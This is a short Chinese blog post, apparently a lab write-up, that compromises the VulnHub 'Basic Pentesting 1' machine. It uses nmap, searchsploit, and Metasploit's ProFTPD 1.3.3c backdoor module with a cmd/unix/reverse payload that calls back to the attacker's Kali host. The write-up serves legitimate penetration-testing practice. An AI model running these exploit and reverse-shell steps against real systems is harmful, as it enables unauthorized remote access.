综合实战第一章-ftp系实战

综合实战 渗透测试 靶场练习 FTP
靶场练习
发布日期:   2022-04-24
文章字数:   210
阅读次数:  

综合实战第一章

ftp系实战

环境准备

靶场下载:https://www.vulnhub.com/entry/basic-pentesting-1,216/

攻击机:

kali 192.168.3.134

win7 192.168.3.137

靶机:BASIC_PENTESTING_1 192.168.3.174

信息搜集

nmap扫描

nmap -p- -A 192.168.3.174

image-20220508161830087

发现有21,22,80端口

看到了proftpd,可以看看有没有现成漏洞

搜索漏洞库

searchsploit ProFTPD 1.3.3c

image-20220508161932988

漏洞利用

打开msf,搜索相关漏洞

msfconsole
search ProFTPD 1.3.3c

image-20220508162233320

看到有个后门漏洞

使用这玩意

use exploit/unix/ftp/proftpd_133c_backdoor
show options

image-20220508162636364

设置参数

set rhosts 192.168.3.174

修改payload

set payload cmd/unix/reverse
set lhost 192.168.3.134
exploit

image-20220508163332502

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/04/24/proftpd/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
综合实战 渗透测试 靶场练习 FTP
  目录